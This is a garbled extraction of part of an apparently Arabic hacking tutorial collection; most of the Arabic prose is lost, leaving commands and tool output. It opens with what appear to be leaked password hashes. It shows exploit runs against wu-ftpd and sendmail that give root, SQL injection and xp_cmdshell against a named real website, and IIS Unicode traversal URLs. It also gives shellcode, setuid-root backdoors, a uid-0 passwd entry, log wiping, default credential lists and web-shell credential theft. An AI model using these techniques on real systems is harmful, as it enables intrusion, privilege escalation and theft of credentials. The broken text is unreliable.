uucp:NP:6445::::::
nuucp:NP:6445:::::: listen:*LK*:::::::
nobody:NP:6445::::::
noaccess:NP:6445::::::
nobody4:NP:6445::::::
www:WJctaI.8rcSe2:10507::::::
mirrors:gg9p.5kwGw1MY:10911::::::
sid:stXldZKnujFYo:10515::::::
mirror:iMPWwbrU.gB4k:10601::::::
admin:hDhB5YYKyWgQw:10976:::::
: jerome:XDqnOl32tPoGo:10976::::::
erl:0jE9Xem4aJYeI:10982::::::
::::::landmark:0jCgWu6vl8g0s:11185
---------------------------------------------------------------------------------------------- .
x


-:
557


...

-:


www.securiteam.com/exploits/archi
ve.html

/http://www.ussrback.com
+
/http://www.secureroot.com

/http://www.rootshell.com
558


/http://www.ussrback.com

www.secureroot.com/category/expl
oits

www.hitboss.com/Hacking

www.undergroundnews.com/resour
ces/s...ound/search.asp
Warez.com-Underground
/http://www.warez.com
Hacking
((
/http://www.neworder.box.sk

559

Security Search Engine


/http://www.bugs2k.com
insecure
/http://www.insecure.org
<XMP></BODY></HTML/>
http://public.www.easynet.co.
uk/cgi...ail/formmail.pl

560

" ) ( "
> <
...



..




.....

561




....


* ) (host

* )
(passwd


/etc/passwd
shadow
562

passwd

. john the ripper







. ) (pwd ) (



bin .
etc .
. passwd
563

dev
lib .

tmp
usr
.
. nt

nt.
admin.pwd
*

cgi-
bin cgi


564

php.cgi

/http://www.jewish.org
/http://www.jewish.org /cgi-bin
php.cgi

http://www.jewish.org/cgi bin/php.cgi.

scripts

565

http://www.jewish.org/scripts/php.c
gi
scripts winnt
cgi-bin

566

" )( "
><
>< ICER :
: ...

)(

...

(:
.

567

nslookup, host, dig, ping,


traceroute,telnet, ssh, ftp
. gcc
)... (
nmap and netcat
.
* :
-1
..

.
-2 nmap .
-3 NetCat .

-4
.

.

...
.
....
568

: *
(a) Linux (http://www.slackware.com
(b) Nmap (http://www.insecure.org
c) NetCat
/(http://www.l0pht.com/~weld/netcat
(
-:
) -1
( P:
: nmap -2
tar zxvf nmap.tar.gz (1*
cd nmap (2
configure && make && make/. (3
install
.. -3
www.target.com
. -4
nslookup www.target.com
569


196.1.2.3
-5
-: .
"nmap -sS -O 196.1.2.3"
-: .
root@IcEr:~# nmap -sS -O 196.1.2.3
Starting nmap V. 2.54BETA22
( /( www.insecure.org/nmap
Interesting ports on
:(www.target.com (196.1.2.3
The 1531 ports scanned but not)
(shown below are in state: closed
Port State Service
tcp open ftp/21
tcp open smtp/25
tcp open http/80
tcp open sunrpc/111
tcp open auth/113
tcp open printer/515
570

tcp open unknown/963


tcp open kdm/1024
tcp filtered krb524/4444
tcp open X11/6000
tcp filtered napster/6699
OS guess for host: Linux 2.2.142.2.16
Uptime 0.160 days (since Mon Apr
(30 14:51:06 2001
Nmap run completed -- 1 IP address
(1 host up) scanned in 67 seconds
#~:root@IcEr

(: .
...
.
FTP ..
daemon
571



FTP daemon
-:
"telnet 196.1.2.3 21"

"ftp 196.1.2.3"


:
root@IcEr:~# ftp 196.1.2.3
.Connected to 196.1.2.3
www.target.com FTP server 220
(Version wu-2.6.0(1) Mon Mar 6
(13:54:16 SAST 2000
.ready
Name (target:root): anonymous
Guest login ok, send your 331
complete e-mail address as
.password
:Password
572

Welcome, archive user! This is-230


an experimental FTP server. If have
any
unusual problems, please-230
report them via e-mail to
root@IcEr.pandora.net
If you do have problems, please-230
try using a dash (-) as the first
character
of your password -- this will-230
turn off the continuation messages
that may
.be confusing your ftp client-230
-230
Guest login ok, access 230
.restrictions apply
.Remote system type is UNIX
.Using binary mode to transfer files
ftp>by
#~:root@IcEr

573

.
.wu-2.6.0

anonymous ;(
####### #######
7 8 -:

.FTPd
) (
wuftpd2600.c

. red hat
6.2
. .



root access
;(-
root@IcEr:~/# ./wuftpd2600 -t -s 0
196.1.2.3
574

Target: 196.1.2.3 (ftp/<shellcode>):


RedHat 6.2 (?) with wuftpd 2.6.0(1)
from rpm
Return Address: 0x08075844,
AddrRetAddr: 0xbfffb028,
Shellcode: 152
..loggin into system
USER ftp
Guest login ok, send your 331
complete e-mail address as
.password
<PASS <shellcode
Next time please use your e--230
mail address as your password
for example: icer@ae.net -230
Guest login ok, access 230
.restrictions apply
STEP 2 : Skipping, magic number
already exists:
[[87,01:03,02:01,01:02,04
STEP 3 : Checking if we can reach
our return address by format string
575

STEP 4 : Ptr address test:


0xbfffb028 (if it is not 0xbfffb028 ^C
(me now
STEP 5 : Sending code.. this will
.take about 10 seconds
Press ^\ to leave shell
Linux lame_box.za.net 2.2.14-5.0 #1
Tue Mar 7 21:07:39 EST 2000 i686
unknown
uid=0(root) gid=0(root) egid=50(ftp)
(groups=50(ftp
!Bang! You have root

..
man gcc
..

(:


search..U will find what U wanna
576

... ..
.. ..
annonymous
..
.. .
..

..
. ..

.. .

577

578

" " htaccess


><
>< BSD-r00t :
| *
| * htaccess.
| * htaccess.
|
| * error
|
579

|
|

| *
| index
| * /
|
|
| *
| * .htpasswd
|
|
| * htaccess.
| * htaccess.
|
|
| *
|
| *
-------------------------------------------------*
-----------
,

.. . htaccess.
.

580

* htaccess.
---------------------- -1
-2 error
-3
index
-4/
-5 html ,.
.. .asp
-6

* htaccess.
--------------------------
" "Notepad

htacces.
txt. ,

581

" - "htaccess.
. -

* error
-----------------------



.


.
error
-:
- error
-
- htaccess.
ErrorDocument error_num
directory_file
582

. " error_num
directory_file "
error
.
:
ErrorDocument 404
/errors/nfound.html
- : errors
----------------------| Bad Syntax | 400 |
----------------------| Unauthorized | 401 |
----------------------|
Not Used | 402 |
----------------------| Forbidden | 403 |
----------------------| Not Found | 404 |
----------------------583

*
index
----------------------------------------------
index.

-:
- index "
"
-. htaccess.
-:
Options -Indexes

* /
------------------------------------ . htaccess.

584



..

- :
???deny from ???.???.???.
... .

-:
deny from all

-:
... allow from
...

*
------------------------------------585

Redirection
htaccess. .

. .
htaccess


-:
???Redirect/???.
???/somewhere/???.
http://www.site.com/newlocation
???.???/somewhere/

??/http://www.site.com/newlocation
? ???.
.
---------* .htpasswd
------------------------

586

. htaccess.
, . .
htaccess
htpasswd
-:
user1:EncryptedPwd1
user2:EncryptedPwd2
o user1 , user2 . .
o EncryptedPwd1 ,
EncryptedPwd2


http://www.euronet.nl/~arnow/htpas
swd

http://www.e2.unet.com/htaccess/make.htm
587

Security
fu93hds3

http://www.euronet.nl/~arnow/htpas
swd
o username : Security
o passwrod & re-enter password :
fu93hds3
o claculate
Security:893bNicBcwszw <- htaccess.
. .
htaccess
.
* htaccess.
---------------------------

,
.
588

htaccess.


.

--:

AuthUserFile
/somewhere/.htpasswd
"
AuthName "Enter your user and
passed please
Require valid-user
AuthType Basic

><Limit GET POST


589

require valid-user
><Limit/
o /somewhere/.htpasswd
htpasswd.
o Enter your user and passed
please

* htaccess.
----------------------------
,

..

- :

><Files .htaccess
590

order allow,deny

deny from all


><Files/
error
. 403

*
------------------------------ .
html. txt. .
-:
AddType text/plain html

-:

591

http://www.pharaonics.net/books/MI
ME.txt

" " FTP


> <
> :<
FTP

FTP File Transfer


592

Protocol
TCP/IP

FTP .


Formats
. ,FTP

.
. :
:
:Download
Host
.Local
:Uplaod
593

Local
.Host
:
:Secure FTP
.
. . .
:Anonymous FTP
.
. guest anonymous
.
.:
:Public Domain
. .

594

.
:Freeware
.
.
:Shareware


.

FTP :


:ASCII
595

)American Standard Code for


(Information Interchange
bits
.127.
.
. ..
.
:Binary
.
bits 255
.
ASCII
& jpg & gif
bmp
avi - ram - mpg - mp3
- wav
.
exe - com - bat - dll - drv - :
596

sys - bin - ovl - zip - mim - uue - xxe


- b64 - bhx
MS Office
.

: FTP
:
. . UNIX
.
:UNIX
:ascii ASCII

.
597

:binary

.
:status
ASCII .Binary
:help .UNIX
:dir
:ls .
:cd directory .
:get filename
.
:mget filename .
:pwd .
598

:bye . .
. :Shell



Tripod Unix Shell
ftp :
ftp ftp.tripod.com
" "IronPrivate .
"******" .

. Unix.
. Unix
:
http://www.pcworlds.net/lunexx.html
. .
599

. :Browser

URL
ftp:// http://
FTP

.
. :SLIP/PPP

. .Client Programs

Windows .Ws_ftp

. :Ws_ftp LE 5.06

Session
Profile .
600

Profile Name
My Home Page In
Tripod Host Name
ftp.tripod.com
Host Type Auto Detect .
.
User ID
IronPrivate
Password .
****** , .OK :

601

.



...
.
.
.
:Telnet
Telnet
.


. .
. . .
Windows . .

""
.

602

. Telnet :Windows Telnet


Windows
Start
Run Telnet
.. Connect Remote
.System Connect
Host Name
Port
) (
Term Type .
Connect
.
Disconnect
Connect .Exit

" "FTP
603

> <
>< hacker dz :
. .
FTP
.

21

FTP


Superscanne


Start

Run

604

ftp n

<FTP
.

Open

Enter

<FTP
To

To



Connected to www.assassin.com
websrv1 Microsoft FTP Service 220
.((Version 4.0

605

ftp>quote user ftp



Anonymous acces allowed, 331
send identify (e-mail name) as
.password

ftp>quote cwd ~root

Please login with USER and 530
PASS

ftp>quote pass ftp

.
.Anonymous user logged in 230

.

.
.

606

20


.
Pwd

Cd
.
Cd black
.
Ls

Get

Get black.exe
Put

Get


607

Put black.exe
Clos



.
:Codes:
Signification
.Restart marker reply
110
Service ready in nnn
120
(minutes. (nnn est un temps
Data connection already
125
.open; transfer starting
File status okay; about to
150
.open data connection
.Command okay
200
Command not
202
608

implemented, superfluous at this


.site
System status, or system
211
.help reply
.Directory status
212

.File status
213
.Help message
214
.NAME system type
215
.Service ready for new user
220
Service closing control
221
.connection
Data connection open; no
225
.transfer in progress
.Closing data connection
226
Entering passive mode (h1,
227
.(h2, h3, h4, p1, p2
.User logged in, proceed
230
Requested file action okay,
250
.completed
609

.PATHNAME" created"
257
User name okay, need
331
.password
.Need account for login
332
Requested file action
350
.pendingfurther information
Service not available,
421
.closing control connection
.Can't open data connection
425
Connection closed; transfer
426
.aborded
Requested file action not
450
taken. (Fichier dj utilis par autre
(chose
Requested action aborded:
451
.local error processing
Requested action not taken.
452
(Pas assez de mmoire pour
(excuter l'action
Syntax error, command
500
.unrecognized
Syntax error in parameters
501
610

.or arguments
Command not
502
.implemented
Bad sequence of
503
.commands
Command not implemented
504
.for that parameter
.Not logged in
530
Need account for storing
532
.files
Requested action not taken.
550
(Fichier non trouv, pas d'accs
(...,possible
Requested action aborded:
551
.page type unknown
Requested file action
552
.aborded
Requested action not taken.
553
((Nom de fichier non attribu

611

" " SQL


> <
>< linuxray :
: ) ( SQL


ASP
SQL ASP
SQL
SQL
1433
SQL


SQL
.
612

:
SQL

PHP ASP






_LinuxRay

-. - -
. Administrator


...

:
613

SQL
User Name Passwd
: .

User name
and Passwd ASP
* sql.
htr.+
. :

http://target/page.asp+.htr
: target
: Page asp
: htr.+

.
....
614


View
ASP Source
:

%>
Set DB=
Server.CreateObject("ADODB.Conn
("ection
DB.Open "DRIVER=SQL
Server;SERVER=xxx;UID=sa;PWD=;
APP=Microsoft (R) Developer
Studio;WSID=xxx;DATABASE=moe
"_dbs", "_LinuxRay", "6666666

<%
---------------------------------------------------------------_ .
615

LinuxRay
6666666
----------------------------------------------------------------


ASP :
AMicrosoft VBScript runtime error
''800a01a8
'Object required: 'Conn
filename.inc, line 5/
* inc.

.

.
616

ASP

database.inc
>!<--"include file = "database.inc#--

global.asa
global.asa++
beforemilion-global.asa
global.asamilion.sql
global-direct.asa

SQL
617

:
global.asa+.htr
IIS 3
ASP data$::
file.asp::$data
IIS 3
.

...
.
!! SQL
.
Visual interdev 6.0
. ACCESS 2000

File
618


New

(Project (Exiting Data
.

Create


Data Link Properties
-
. -
- 1 Select or
enter server name
- 2 . User Name
- 3 Password
) Blank
619

(Password
Test Connection

Test Connection Succeeded
.

:
Select the data base on the server
OK .

" " SQL


> . <
>< hish_hish :
.
(:
620

. ,

PHP ASP

.
SQL Server , MySQL,Oracle

.
.
SQL

.
.

. .
.
. (:
((((:
.

.
SQL
621

.
.
.
.
.

SQL
.
SQL injection



/http://www.stc.com.sa

http://www.stc.com.sa/arabic/script
s/ar_frame.asp?pagenum=25
.
!!!!
SQL
622

injection
.
' : .
' :

:

Microsoft OLE DB Provider


for ODBC Drivers error
''80040e14
Microsoft][ODBC SQL Server]
Driver][SQL Server]Unclosed
quotation mark before the
.' '' character string
/
arabic/Scripts/ar_csd_reply.a
sp, line 33


623

Microsoft OLE DB Provider


for ODBC Drivers error
''80040e14
Microsoft][ODBC SQL Server]
Driver][SQL Server]Unclosed
quotation mark
before the character string '''
.''=AND Password
admin/admin.asp, line 13/

SQL

SQL inject
. Query
.
SQL injection

624

.
. .

:code
SELECT * from Users
WHERE User_Name='<field
from web form>' AND
Password='<field from
'<web form
}( if( TRUE
Login OK
{
} else
Login FAILD
{
.
.

.
625


. admin :
t0ps3cr3t :
SQL :
:code
SELECT * from Users
WHERE
Users_Name='admin' AND
'Password='t0ps3cr3t
User
. admin
t0ps3cr3t
. TRUE
. .
FALSE
:
. SQL
> <field from web form
626

.
' .
SQL :
:code
SELECT * from Users
' ' '=WHERE User_Name
' ' '=AND Password


!!
. . . blah' OR '1'='1 :
.
SQL
:code
SELECT * from Users
'WHERE User_Name='blah
OR '1'='1' AND
627

Password='blah' OR
''1'='1

SELECT * from Users
Users
WHERE User_Name='blah' OR
'1'='1' AND Password='blah' OR
''1'='1
. .

''blah' OR '1'='1
OR



''blah

TRUE
''1'='1
1 1. !!!!
628

TRUE OR
TRUE
TRUE

: TRUE
TRUE

. . TRUE
TRUE. SQL injection
.
Users



.....
SQL
WHERE
. (two dashes) --
,

. --'blah' OR '1'='1 :
629

)
--
SQL .


having clause .

'having 1=1-- .

Microsoft OLE DB Provider for
'ODBC Drivers error '80040e14
Microsoft][ODBC SQL Server]
Driver][SQL Server]Column
'cs_isp_user.UserID' is invalid in the
select list because it is not
contained in an aggregate function
.and there is no GROUP BY clause
Arabic/Scripts/ar_csd_reply.asp,/
line 33
630



. group by

'group by cs_isp_user.UserID- passwd

group by-cs_isp_user.UserID,cs_isp_user.pa
'sswd

. !
.

. :
. blah' group by :
--((username
:
:
631

Microsoft OLE DB Provider


for ODBC Drivers error
''80040e14
Microsoft][ODBC SQL Server]
Driver][SQL Server]Invalid
.'column name 'username
/
arabic/Scripts/ar_csd_reply.a
sp, line 33


username
password .
,username,id,userid,email
first_name,
userid

:

632

Microsoft OLE DB Provider


for ODBC Drivers error
''80040e14
Microsoft][ODBC SQL Server]
Driver][SQL Server]Column
'cs_isp_user.passwd' is
invalid in the select list
because it is not contained in
either an aggregate function
.or the GROUP BY clause
/
arabic/Scripts/ar_csd_reply.a
sp, line 33


cs_isp_user
passwd
. .

blah' group : . .
633

--(by (passwd
:
:

Microsoft OLE DB Provider


for ODBC Drivers error
''80040e14
Microsoft][ODBC SQL Server]
Driver][SQL Server]Column
'cs_isp_user.UserID' is
invalid in the select list
because it is not contained in
either an aggregate function
.or the GROUP BY clause
/
arabic/Scripts/ar_csd_reply.a
sp, line 33

UserID
634

userid
MS SQL Server
(:

UserID passwd


. .
.
(:
. . blah' :
INSERT INTO
cs_isp_user(UserID,passwd
( --('VALUES('M_3','hi
. .
M_3 hi


) (
inject

635

id
. ) (
user

id
username )
.( admin1
passwd
union
)
(
. blah' union SELECT :
username FROM user


:
636

Microsoft OLE DB Provider


for ODBC Drivers error
''80040e14
Microsoft][ODBC SQL Server]
Driver][SQL Server]All
queries in an SQL statement
containing a UNION operator
must have an equal number
of expressions in their target
.lists
admin/admin.asp, line 13/

id .
blah' union SELECT
username,username FROM user



.
blah' union SELECT
637

username,username,usernam
e,username,username FROM user

:

Microsoft OLE DB Provider


for ODBC Drivers error
''80040e07
Microsoft][ODBC SQL Server]
Driver][SQL Server]Syntax
error converting the
varchar value 'Lame_Admin'
.to a column of data type int
admin/admin.asp, line 13/

.( :


). SQL
638

(Lame_Admin ) (int
, .
Lame_Admin
(: microsoft
(:
.

. blah' union:
SELECT
passwd,passwd,passwd,pass
wd,passwd FROM user
.

:

Microsoft OLE DB Provider


for ODBC Drivers error
''80040e07
]Microsoft][ODBC SQL Server
Driver][SQL Server]Syntax
639

error converting the


varchar value 'stupid' to a
.column of data type int
admin/admin.asp, line 13/

.

. .
.
Stored Procedure
Built-
in.
Stored Procedure
SQL Server . sa
. SQL
Server
640

SQL
Server
Stored Procedure 100

---------------------------+
--------------------------------------------------+
+---------------------------| |----------xp_cmdshell .
)
.(|-------
| |-----------xp_regread
-----------------------------------------
|--| |----xp_regdeletekey
-----------------------------------------
|-------| |-xp_regdeletevalue
-----------------------------------------
|--| |---------- xp_regwrite
641

-----------------------------------------
|-------------| |--xp_servicecontrol

--------------------------------------------
|
----------------------------+
--------------------------------------------------+
+---------------------------


Procedure
'exec master..xp_cmdshell 'dir

. xp_cmdshell


'exec master..xp_regwrite
642

'REGISTERY KEY' VALUE


asp
asp


))CREAT TABLE M_3 ( source
varchar(8000
. M_3
varchar
8000


'bulk insert M_3 from
'c:\InetPub\wwwroot\login
asp.

643



union
.

"
"
> . <
>< CONIK :


644




-:

-:1

-: .
645

user administrator
.

) (



646

-:2

-: %99
C

.
shell


PHP
Shell PHP ..
647

Kernel 2.2.x
.

) C
(
perl

.
linux Redhat 7.3


648

-:3
-:

file.pl/.

----Access Denied .

-----chmod +x Conik.pl

649


Conik.pl/. $
-:4 C
-: .

<------ gcc -o Conik Conik.c



-:

gcc -o Conik conik.c


Conik.c/.
650

gcc -o sendmail sendmail.c $


sendemail/. $

Usage : sendmail <host> <OS>


<<user> <password
sendmail smtp.israel.com/. $
RedHat-7.3 anonymous anonymous
< ----israel
...connecting to host
...connected
id
(uid=0(root) gid=0(root

Sendemail
.
651

Root
. Exan nofer
XXX.
SENDMAIL


(-:

.
-:5

-:

-:6 Conik
652

. C Perl
.


PHP - CGI -
UNICODE - VB - etc

-:7 UNICODE

-: UNICODE
. IIS Microsoft


-: UONICODE
653

vti_bin/.._/
%25%35%63..%25%35%63..%25%35
%63..%25%35%63..%25%35%63../wi
\:nnt/system32/cmd.exe?/c+dir+c
Rpc/../
%25%35%63..%25%35%63..%25%35
%63winnt/system32/cmd.exe?/c+dir
\:+c
samples/..%255c..%255c..%255c../
%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
adsamples/..%255c..%255c..%255c../
%255c..%255c..
%255cwinnt/system32/cmd.exe?/c+
\:dir+c
scripts/..%255c../
%255cwinnt/system32/cmd.exe?/c+
654

\:dir+c
msadc/..%c0%af../..%c0%af../../
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c
cgi-bin/..%c0%af..%c0%af../
%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/
\:c+dir+c

UONICODE

CGI
cgi-bin/view-/
source?../../../../../../../etc/passwd
cgi-bin/phf/
655

cgi-bin/wwwboard.pl/
cgi-bin/AT-admin.cgi/
cgi-bin/info2www/
cgi-bin/environ.cgi/

NT : Uni code , bofferoverfollow ,


tftp

Liunx : Get Access , CGI , buffer


overfollow , PHP , send mail ,
ProFTPD, WU-FTPD, Kernel
,Exploits, rootkits
656

UNIX : Get Access , CGI , buffer


overfollow , PHP , send mail , Kernel
exploits, rootkits, ProFTPD, WU,FTPD

657

658

"
"
> <
><Black_sNiper :

...

.
...

.
.
659

. .:

who
rwho
finger

.

.:
username : Black
password : Black2
test
demo

. .:
660

etc/passwd/
etc/group/
etc/hosts/
usr/adm/sulog/
usr/adm/loginlog/
usr/adm/errlog/
usr/adm/culog/
usr/mail/
usr/lib/cron/crontabs/
etc/shadow/
.: bin
.


)(
)( !!
.:
$ ed passwd
exec login
.!!
661

.
. !!
. .:
.
)( . ..
.:
$ pwd
.:
$ /usr/admin

. ..
.. :
$ /usr/Black
.!!
. .:
$ ls /usr/Black
. .:
mail
pers
games
662

bin
profile.
.:
$ cd
$ ls -a
:
:
profile.
$

.:
$ cat letter
letter
.:
$ passwd
!!
..
.:
$ grep phone Black
663

.
.
.:
$ cp letter letters
.
.:
$ write
. .:
$ who
safadM tty1 april 19 2:30
paul tty2 april 19 2:19
gopher tty3 april 19 2:31

. .
..
.:
$ cat /etc/passwd
664

:/:root:F943/sys34:0:1:0000
sysadm:k54doPerate:0:0:administra
tion:usr/admin:/bin/rsh
checkfsys:Locked;:0:0:check file
system:/usr/admin:/bin/rsh
.:
Black:chips11,43:34:3:Mr
:doooom:/usr/Black
.

..
.:
$ ls /etc/group
root::0:root
adm::2:adm,root
:bluebox::70

665


!!

. .
. ..

666

"

"
><
> : <
UNix Usage IN HackinG


.. up to date
667



(:
: pc ,
servers , supercomputers
BOX
. .
..
... root
, superuser
.....
:
.. . .
.. windows .
. ..
.. ...

:
-1
...
nt . 9x
668


.. .
..
..
-2 ..
..
...
.. :
-1 ). (
-2 open
source

.. (:

BSD . ..


...
..
669

..
) SuSe
(
MDK

..


9 7.2
) (
.. .. ...
.. ..
..
.. ... .. ..
.
.. ...
.. (:
..

670

.. . ...
.. ..
. ..
.
.. . ..
.

.. ..
internal
.. winmodems
.
.. windows . ..
. (:
.. . external
. real or true modems
... acorp ,
u.s. robotics
. serial USB
...
.. isp
. (:
671



..



:
-1 ..


isp ...
-2
...
-3 ... ..
..
(:
=====< ...
..
======< ======<
...
..
.
672

:

.
. ..
..
-4 .
gov .mil edu.
.
-5 ..
.
REdirecting
: TCP .
..
TCP\IP
....
... =D

.. .

673

..
) (

..
<< service
service
daemon or server
.. .
. .. .
=D
..

21
23
25

FTPd
FTP
telnetd Telnet
sendmail
SMTP

(!(yes
apache
HTTP
80
qpop
POP3
110
d ftp , telnet ..etc
daemon
674

:
www.host.net
.
TCP 80
.
GET /HTTP/1.1 /index.html
..
.
index.html
daemons
...
=<
.
daemons

...
..
... port scaners

675

..

...
nmap fyodor
!!.. ..
=>
http://members.lycos.co.uk/linuxd
/ude/e3sar
..
nmap rpm
:
bash-2.03$ rpm -i nmap-2.531.i386.rpm
. ..
. target.edu
..
:
bash-2.03$ nmap -sS target.edu

676

Starting nmap V. 2.53 by


fyodor@insecure.org
( /( www.insecure.org/nmap
Interesting ports on target.edu
:((xx.xx.xx.xx
The 1518 ports scanned but not)
(shown below are in state: closed
Port
State
Service
tcp open
ftp/21
tcp open
telnet/23
tcp open
smtp/25
tcp open
http/80
tcp open
pop3/110

Nmap run completed -- 1 IP


address (1 host up) scanned in 34
seconds

nmap .
!! .
677


daemons target.edu

..
.. ..
.. ..
..
... TCP :
bash-2.03$ telnet target.edu 21
...Trying xx.xx.xx.xx
.Connected to target.edu
.'[^' Escape character is
target.edu FTP server 220
.(SunOS 5.6) ready
quit
.Goodbye 221
Connection closed by foreign
host

(:
678

SunOS 5.6 . -1
standard -2
sunOS
:
bash-2.03$ telnet target.edu 25
...Trying xx.xx.xx.xx
.Connected to target.edu
.'[^' Escape character is
target.edu ESMTP Sendmail 220
8.11.0/8.9.3; Sun, 24 Sep 2000
09:18:14 -0
(EDT) 400
quit
target.edu closing 2.0.0 221
connection
Connection closed by foreign
.host

679

smtp
sendmail
8.11.0/8.9.3
..

daemon . ..


:
nmap
bash-2.03$ nmap -sS target.edu
Starting nmap V. 2.53 by
fyodor@insecure.org
( /( www.insecure.org/nmap
Interesting ports on target.edu
:((xx.xx.xx.xx
)The 1518 ports scanned but not
(shown below are in state: closed
Port
State
Service
tcp open
ftp/21
tcp open
telnet/23
680

tcp open
tcp open
tcp open

smtp/25
http/80
pop3/110

TCP Sequence Prediction:


Class=random positive increments
Difficulty=937544
(!(Good luck
Remote operating system guess:
Linux 2.1.122 - 2.2.14
Nmap run completed -- 1 IP
address (1 host up) scanned in 34
seconds
|:
.
!!!!!!
@= !!!!!! sunOS

681

.
..

..

...

Ss-
=D
:
bash-2.03$ man nmap
..
)
(
:
bash-2.03$ ls
program.c
sh-2.03$ ftp shell.com
Connected to shell.com
shell.com FTP server 220
.(SunOS 5.6) ready
682

Name: luser
.Password required for luser 331
:Password
.User luser logged in 230
ftp> put program.c
.PORT command successful 200
ASCII data connection for 150
.(program.c (204.42.253.18,57982
.Transfer complete 226
ftp> quit
Goodbye 221
ftp
.
.
.
sh-2.03$ vi exploit.c

c.
.


683

sh-2.03$ gcc program.c -o program


sh-2.03$ ./program
:
..


. usage
-: .
.

.
..
http://www.linux.com.cn/hack.co.za
..

..


684

.
.. TARGET.EDU
.
sendmail 8.11.0

..

:
http://www.pharaonics.net/less/NEt
works/124.htm
. .
.. )
(
..
....

..


..

685

:
www.securityfocus.com
www.insecure.org/sploits.html
..

..
...
. ) (

.
shell code
. ..
.


= []char shellcode
"\
xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88
"\x46\x07\x89\x46\x0c\xb0\x0b

686

"\
x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd
"\x80\x31\xdb\x89\xd8\x40\xcd
"\;"x80\xe8\xdc\xff\xff\xff/bin/sh

.. .
bin/sh/
.

. ..

.
...

.. .
..
bash-2.03$ telnet myshellaccount
23
...Trying xx.xx.xx.xx
.Connected to yourshellaccount
687

.'[^' Escape character is


Welcome to yourshellaccount
login: malicioususer
(Password: (it doesn't display
Last login: Fry Sep 15 11:45:34
.<from <yourIPaddress
sh-2.03

exploit.c
..
:
sh-2.03$ gcc exploit.c -o exploit
sh-2.03$ ./exploit
This is a sendmail 8.9.11 exploit
usage: ./exploit target port
sh-2.03$./exploit 25 target.edu
$...
:
whoami$
688

root
.. =(

..
.
local
....

) =((

.. =<
-: .. ..
.


. ..
..
edu.

689


.
microsoft.com , ibm.com etc

...
..

<----- <------
.

.. exit


.
.

..

...
..
..
... =| =|
690

.
=| !!!!!!
(= ...

.

..
..
-1 sushi
. sushi suid shell
. bin/sh/
. suid
:
sh-2.03$ cp /bin/sh /dev/nul


.. dev
null
= D =D
sh-2.03$ cd /dev
sh-2.03$ chown root nul
691

-:
sh-2.03$ chmod 4775 nul
4775 suid .
chmod +s nul
..
..
..
sh-2.03$ exit
80. = D
:
sh-2.03$ whoami
luser
sh-2.03$ /dev/nul
sh-2.03$ whoami
root
=(

692

..
suid
sushi

sash A
stand-alone shell
...
suid /
bin/sh sushi
-2
/
etc/passwd

-: vi
sh-2.03$ vi /etc/passwd
. .
vi


luser:passwd:uid:gid:startdir:shell
693

uid & gid =0


:
dood::0:0:dood:/:/bin/sh
.
sh-2.03$ su dood
sh-2.03$ whoami
dood
.. dood
gid uid
-3 bindshell
bindshell
telnetd
..

.
TCP UDP
..

694




TCP
UDP
-: . .. .
..
..


Last login: Sun Sep 24 10:32:14
.<from <yourIPaddress



-:

..
695


..
=(

usr/adm/lastlog/
var/adm/lastlog/
var/log/lastlog/
. lled
..

. ...
. ftp

. wted lled
who
sh-2.03$ who
Sep 25 18:18

tty1
696

root

. zap2
: luser
sh-2.03$ ./zap2 luser
!Zap2
sh-2.03$ who
sh-2.03$
:

..
.

697

698

"
"
> <
> : <
...

.

. .


.


699

FreeServers.com

. :
.




700

.
.

.


.

.




Caller ID
...

701

notepade

Hakkerz.home.ml.org

html

@Blahblahblah
.
.

header

.
IP
Whois
702



. finger
@Finger


. scan ports
IP

Linux /Unix systems

Exploit Generator



703

. linux
21
FTP 23
TelNet
Telnet
Anonymous
. .

hakkerz.home.ml.org
telnet 23
www

telnet.Victim.com telnet
www
whois


21
ftp
704

SYST
80 http

Whats
?Running

.

.
Login: root$
Password: root$
linux

. . telnet
.


ACCOUNT: PASSWORD
705

login) root: (password) root)


sys: sys / system / bin
bin: sys / bin
mountfsys: mountfsys
adm: adm
uucp: uucp
nuucp: anon
anon: anon
user: user
games: games
install: install
demo: demo
umountfsys: umountfsys
sync: sync
admin: admin
guest: guest
daemon: daemon


.

706

whois
.
unix .
passwd

. ftp
. internet
explorer
. IP
jammer
.hakkerz.home.ml.org
.

ftp:// abc.net /ftp://ftp.abc.net
ftp
whois
\ etc
passwd

root:2fkbNba29uWys:0:1:Operator:/:
707

/bin/csh
admin:rYsKMjnvRppro:100:11:WW
W
administrator:/home/Common/WW
W:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisahar
u
[.etc]
kangaroo .
3a62i9qr

root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW
administrator:/home/Common/WW
W:/bin/csh
kangaroo:*:1012:10:Hisaharu
TANAKA:/home/user/kangaroo:/usr/
local/bin/tcsh
708



* s ?xs

John the Ripper 1.5
.

709

710

" ) PHP Shell


( "
> < pharaonics
>> Arab VieruZ:


. ...


(:

:

:

711

PHP Shell
**-----------------------------------------------
:

**-----------------------------------------------
ls -a :

**-----------------------------------------------
cat -e : cat

**-----------------------------------------------
712

rm -f :

**-----------------------------------------------
rm -d :

**-----------------------------------------------
cp -i :

**-----------------------------------------------
mv :

713

**-----------------------------------------------
:

--
help
ls --help :
**-----------------------------------------------
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------

714

-1
715

-2
-3
-4
-5
**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
!!!


716

-1
: hacked.txt
**-----------------------------------------------
-2






**-----------------------------------------------
-3 .

717

" ) PHP Shell


( "
718

> < pharaonics


>> Arab VieruZ:

**-----------------------------------------------
**-----------------------------------------------
:
:
**-----------------------------------------------
PHP Shell 2

.
719

**-----------------------------------------------
-1 My SQL
config.php

PHP Shell


cat config.php

**-----------------------------------------------
-2 htpasswed.


720

htaccess.
:
home/site/.htpasswds/forum/admin/
/passwd
cat :
/home/site/.htpasswds/forum/admin/
passwd
DES

user:nymw4oS3oerdY
**-----------------------------------------------
-3
: service.pwd

DES
721

:
_vti_pvt
cat :
/home/site/www/_vti_pvt/service.pw
d
: DeXXa
user:nymw4oS3oerdY
**-----------------------------------------------
-4 :

phpMyAdmin

config.php
722

!!

723

" ) PHP Shell


( "
> < pharaonics
>> Arab VieruZ:



**-----------------------------------
-1 :
:
home/
: /
ls -a /home
724


ls -a /home/SITE
= SITE
**-----------------------------------
-2 :
home

:
:
